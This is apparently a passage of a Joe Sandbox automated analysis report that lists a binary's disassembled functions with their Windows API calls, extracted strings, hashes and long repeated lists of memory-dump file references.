                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: DiskFreeSpace
                                                                                                                                                                                                                                                                                    • String ID: C:\
                                                                                                                                                                                                                                                                                    • API String ID: 1705453755-3404278061
                                                                                                                                                                                                                                                                                    • Opcode ID: caa803cb6983296de5ee153f39e565eadd17667fad978c7f1401b26cac8d0a89
                                                                                                                                                                                                                                                                                    • Instruction ID: 3d361454ac5cdfa27015c84eaa1fed5b08bb663ce5d8b65a2c27fb38a1a831b9
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: caa803cb6983296de5ee153f39e565eadd17667fad978c7f1401b26cac8d0a89
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4811C5B69087019FC354DF69D98599BB7E4BF9C700F008A2EF4AE83250E731A548CF96
                                                                                                                                                                                                                                                                                    Function 00462F00 Relevance: 3.2, APIs: 2, Instructions: 213fileCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,00000003), ref: 0046300E
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0046301E
                                                                                                                                                                                                                                                                                      • Part of subcall function 004631F0: FindFirstFileW.KERNEL32(?,00000003,?), ref: 0046326C
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Find$FileFirst$Close
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2810966245-0
                                                                                                                                                                                                                                                                                    • Opcode ID: ac525a0fc5c95755cc08b111d521eb121ac2ef7f5b05646f188b6f13116b70e9
                                                                                                                                                                                                                                                                                    • Instruction ID: 9b1d8f8ee81afef67cdd5002a011b417e39822a31e6c33f357b0cfbac9d9b473
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac525a0fc5c95755cc08b111d521eb121ac2ef7f5b05646f188b6f13116b70e9
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A38161711083819FC314DF14D988AABBBE8FFD9715F000A2EF59A83291DB749948CB67
                                                                                                                                                                                                                                                                                    Function 00460070 Relevance: 3.0, APIs: 2, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(?,00090064,00000000,00000000,?), ref: 00460093
                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004600C0
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ControlDeviceUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 9847766-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 41a6657a76e6a11c21828465e7547c488e33e83233d3adc9080a9250c0d0e56d
                                                                                                                                                                                                                                                                                    • Instruction ID: b288529985f008a1a54ef72dbef53761962e394cc992aae83e13a0fae47ca317
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 41a6657a76e6a11c21828465e7547c488e33e83233d3adc9080a9250c0d0e56d
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40F09CB5254B01AFD324CF55D841F53B7F9AB88B04F104A1DB68A87680D775F814CB55
                                                                                                                                                                                                                                                                                    Function 00449B60 Relevance: 2.8, Strings: 2, Instructions: 289COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: G3H?$V
                                                                                                                                                                                                                                                                                    • API String ID: 0-4140640440
                                                                                                                                                                                                                                                                                    • Opcode ID: aee447dc61f4460ca895c100c7ce5877c7a3853d9c831398d218eb3c86bd2565
                                                                                                                                                                                                                                                                                    • Instruction ID: 49a599d4ef51342f46ea6850bb6920c02977a5b21b33fd7ed232df843d674447
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aee447dc61f4460ca895c100c7ce5877c7a3853d9c831398d218eb3c86bd2565
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0B1DEB1D041689AFB20CB14DC90AEFB7B5EB85311F2440FAD84DA6241E7385EC6DF96
                                                                                                                                                                                                                                                                                    Function 00474040 Relevance: 2.5, APIs: 2, Instructions: 32memoryCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32 ref: 00474063
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00474074
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3859560861-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 41a9c3f869f20d536b5df22bbdb68c6f72c4f4a03b7167ff54cc11ecf120ab97
                                                                                                                                                                                                                                                                                    • Instruction ID: 0e5b393c9cfaccf242b34e640deb84f37198d475fe7bd5f1c49fe5a9f1fc366a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 41a9c3f869f20d536b5df22bbdb68c6f72c4f4a03b7167ff54cc11ecf120ab97
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BDF05E716002405BD7209FA5D848FA3779C9F85350F04C12EE65D873A1DB79E881CB99
                                                                                                                                                                                                                                                                                    Function 0044E95A Relevance: 1.5, Strings: 1, Instructions: 246COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: DiskDefrag\AutoDefragmention
                                                                                                                                                                                                                                                                                    • API String ID: 0-3564132280
                                                                                                                                                                                                                                                                                    • Opcode ID: dc3eb1a8291cfcc44befdd0b81a2d3cc0d6bc2a24e272f937c8f8eb1dffa6e4f
                                                                                                                                                                                                                                                                                    • Instruction ID: e958d21163334a27c47b0fc85bbaacef7bda82fad0e0f943e856080444f81741
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc3eb1a8291cfcc44befdd0b81a2d3cc0d6bc2a24e272f937c8f8eb1dffa6e4f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9691AEB1D045689AEB208B16CC847FAB775FF84310F1081FAD44DA7684EB785EC2CB5A
                                                                                                                                                                                                                                                                                    Function 00434DB0 Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: ZS
                                                                                                                                                                                                                                                                                    • API String ID: 0-2462379649
                                                                                                                                                                                                                                                                                    • Opcode ID: c9fca04b9b31143a71d11b10c0a7b839e3dd0717628822feacdf38de00b63aa6
                                                                                                                                                                                                                                                                                    • Instruction ID: f21c68479b3c5eaebc1f5f3279f8d0faad101d72c6b89a0a1b7083a0ace80ae7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c9fca04b9b31143a71d11b10c0a7b839e3dd0717628822feacdf38de00b63aa6
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C49104B2D055549BE728CB28CD89AEEBBB5EB89300F1481FFD40D67294D6785BC2CE41
                                                                                                                                                                                                                                                                                    Function 00434B30 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: M2PN
                                                                                                                                                                                                                                                                                    • API String ID: 0-1141530561
                                                                                                                                                                                                                                                                                    • Opcode ID: bce53acc8339f026b01eb678d4e04c81f62b6b16d0eeaff7d47bfef90031c058
                                                                                                                                                                                                                                                                                    • Instruction ID: 8b48fcab1f62f79797c961b25b48a75d2e1cd7c856f0701d3c915d2211f122b7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bce53acc8339f026b01eb678d4e04c81f62b6b16d0eeaff7d47bfef90031c058
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F5116F3D012145AF75CCA14ED9AAEBBB78EB81314F1181BFE40EA5580DA7C5BC18E42
                                                                                                                                                                                                                                                                                    Function 0044B583 Relevance: .3, Instructions: 325COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
